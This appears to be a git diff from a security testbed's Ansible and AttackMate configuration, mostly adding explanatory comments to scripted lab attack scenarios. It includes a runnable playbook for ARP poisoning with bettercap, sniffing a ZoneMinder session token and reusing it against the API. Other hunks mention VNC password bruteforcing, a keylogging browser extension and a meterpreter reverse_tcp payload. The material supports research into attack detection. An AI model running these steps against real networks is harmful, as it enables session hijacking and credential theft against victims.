Docs vm connections

ansible/run/scenario3/templates/scenario_3_b_a.j2

@@ -3,9 +3,15 @@
 # Scenario 3 b a
 #
 ####################
-
-# for vnc connection to the display, tunnel with : ssh -J aecid@<mgmt-ip> -L 5901:172.17.100.122:5901 aecid@172.17.100.122
-# then vncviewer localhost:5901
+# VNC access to the reposerver desktop is provided via TightVNC
+# (https://github.com/ait-testbed/atb-ansible-tightvnc), which is configured
+# with a specific user, display, port, and — intentionally — a weak password
+# that is bruteforced as part of this scenario.
+#
+# To watch the reposerver desktop from your local machine, tunnel the VNC port
+# via the management host and connect with a VNC viewer:
+#   ssh -J aecid@<mgmt-ip> -L 5901:172.17.100.122:5901 aecid@172.17.100.122
+#   vncviewer localhost:5901
 
 vars:
   $SERVER_ADDRESS: fw.attackbed.com

ansible/run/scenario5/files/login.yml

@@ -31,7 +31,7 @@ commands:
   - type: sleep
     seconds: 15
 
-#  press login button
+  # press login button
   - type: browser
     cmd: click
     selector: "button[type='submit']"
@@ -42,7 +42,7 @@ commands:
   - type: sleep
     seconds: 15
 
-# this is only needed when the user logs in for the very first time
+  # this is only needed when the user logs in for the very first time
   # press apply button
   - type: browser
     cmd: click
@@ -53,7 +53,7 @@ commands:
   - type: sleep
     seconds: 15
 
-#from here on run in loop
+  #from here on run in loop
   - type: loop
     cmd: until(3 == 4)
     commands:

ansible/run/scenario5/gather.yml

@@ -36,7 +36,15 @@
           - "/etc/sv "
       - src: /var/ossec/etc/ossec.conf
 
-- hosts: lanturtle
+
+# NOTE: In scenario 5, the attacker does not use the usual attacker machine
+# (192.42.1.174). Instead, the attack is carried out from a LAN Turtle device
+# (192.168.100.27) deployed inside the LAN network.
+#
+# This means the ansible hosts file must be updated to point the 'attacker' host
+# to 192.168.100.27 instead of the default 192.42.1.174, otherwise Ansible cannot
+# reach the machine and log gathering will fail silently or error out.
+- hosts: attacker
   roles:
     - kyoushi-gather
   vars:

ansible/run/scenario5/main.yml

@@ -159,7 +159,29 @@
     #   become_user: aecid
 
 
-# to run scenario, deploy, wait 10 minutes, then run first attacker, when get_auth.py is executing then run adminpc login.yml playbook manually
-
-
+# IMPORTANT: Manual triggering required for this scenario.
+#
+# Execution order:
+#   1. Run the deployment playbook and wait approximately 10 minutes for all
+#      services to initialize.
+#   2. Start the attacker playbook (scenario_5.yml) on the attacker machine.
+#      Bettercap will begin ARP poisoning the network and get_auth.py will
+#      start listening for a valid ZoneMinder session token.
+#   3. Once get_auth.py is running and waiting for a session token, MANUALLY
+#      trigger the login.yml playbook on adminpc:
+#
+#        attackmate-tmux /home/aecid/login.yml --json
+#
+#      login.yml simulates an authenticated admin user browsing the ZoneMinder
+#      interface (http://172.17.100.121/zm). It logs in with the admin credentials
+#      and then loops through several ZoneMinder pages to keep the session alive.
+#      This active session is intercepted by the attacker via ARP poisoning and
+#      the session token is extracted by get_auth.py.
+#   4. The attacker uses the stolen session token to call the ZoneMinder API
+#      directly, bypassing authentication entirely.
+#
+# The login.yml playbook runs headlessly on adminpc and could not be fully automated
+# because the timing of the admin login must align with the attacker's sniffing
+# window. Triggering it too early (before bettercap is active) means the token
+# will not be captured.
 

ansible/run/scenario5/templates/scenario_5.j2

@@ -0,0 +1,76 @@
+####################
+#
+# Scenario 5 - AttackMate playbook
+#
+####################
+# This scenario demonstrates session token hijacking against the ZoneMinder
+# video surveillance system running on the videoserver (172.17.100.121).
+#
+# Attack chain:
+#   1. Bettercap performs ARP cache poisoning to position the attacker as a
+#      man-in-the-middle between the adminpc and the videoserver.
+#   2. get_auth.py sniffs the poisoned traffic and extracts the ZoneMinder
+#      session authentication token from HTTP requests made by the admin user.
+#   3. The stolen token is used to call the ZoneMinder API directly, gaining
+#      full authenticated access without ever knowing the admin password.
+#
+# PREREQUISITE: The login.yml playbook must be triggered manually on adminpc
+# after bettercap is running and get_auth.py is waiting. See the deployment
+# playbook scenario5/main.yml comments for the correct execution order.
+
+
+# noinspection YAMLSchemaValidation
+vars:
+  TARGET: 172.17.100.121
+
+commands:
+  # Start bettercap in the background using the provided caplet.
+  # Bettercap performs ARP cache poisoning so that traffic between adminpc
+  # and the videoserver is routed through the attacker machine.
+  - type: shell
+    cmd: sudo bettercap -caplet /home/aecid/bettercap.cap
+    background: True
+    kill_on_exit: False
+    metadata:
+       techniques: "T1040,T1557.002 "
+       tactic: "Discovery,Credential Access"
+       technique_name: "Network Sniffing,Adversary-in-the-Middle: ARP Cache Poisoning "
+
+
+  # Sniff the intercepted HTTP traffic and extract the ZoneMinder auth token.
+  # This script blocks until a valid token is found in the traffic stream.
+  # THIS is the moment to manually trigger login.yml on adminpc if not already done.
+  - type: shell
+    cmd: sudo /usr/local/share/attackmate/venv/bin/python3 /home/aecid/get_auth.py
+    metadata:
+       techniques: "T1040,T1528"
+       tactic: "Credential Access"
+       technique_name: "Network Sniffing for Credential/Session Token Extraction, Steal Application Access Token"
+
+  # Store the captured auth token from the previous command's stdout into $AUTH.
+  - type: setvar
+    cmd: $RESULT_STDOUT
+    variable: AUTH
+
+  - type: debug
+    cmd: $AUTH
+
+  # Bettercap is no longer needed once the token is captured — terminate it.
+  - type: shell
+    cmd: sudo pkill -9 -f "bettercap -caplet bettercap.cap"
+
+  - type: sleep
+    seconds: 5
+
+  # Use the stolen session token to call the ZoneMinder API as the authenticated
+  # admin user.
+  - type: http-client
+    cmd: GET
+    url: http://$TARGET/zm/api/monitors.json?auth=$AUTH
+    metadata:
+       techniques: "T1550.001"
+       tactic: "Defense Evasion, Lateral Movement"
+       technique_name: "Use Alternate Authentication Material: Application Access Token"
+
+
+

ansible/run/scenario6/templates/scenario_6_c.j2

@@ -1,4 +1,18 @@
-# Client installs a malicious browser plugin that extracts keystrokes, content pasted into browser from clipboard and form submissions
+# Client installs a malicious browser plugin that extracts keystrokes, 
+# content pasted into browser from clipboard and form submissions
+
+# IMPORTANT: The VNC commands in this playbook that interact with the client machine
+# do NOT represent actions initiated by the attacker. Instead, they SIMULATE actions
+# performed by the client user (judy). This models a social engineering attack:
+# the attacker, posing as tech support (telephone phishing / vishing), manipulates
+# the client into performing actions on their own machine — such as installing a
+# browser extension. The attacker merely guides the victim's behavior remotely.
+
+# The SSH tunnel used for VNC in the session: social_engineering
+# is routed via the management host (mgmt) rather than
+# through the normal network path. As a result, this traffic bypasses the firewall
+# and does NOT appear in firewall logs, reflecting a realistic out-of-band access
+# path available to a privileged insider.
 
 vars:
   PAYLOAD: linux/x64/meterpreter/reverse_tcp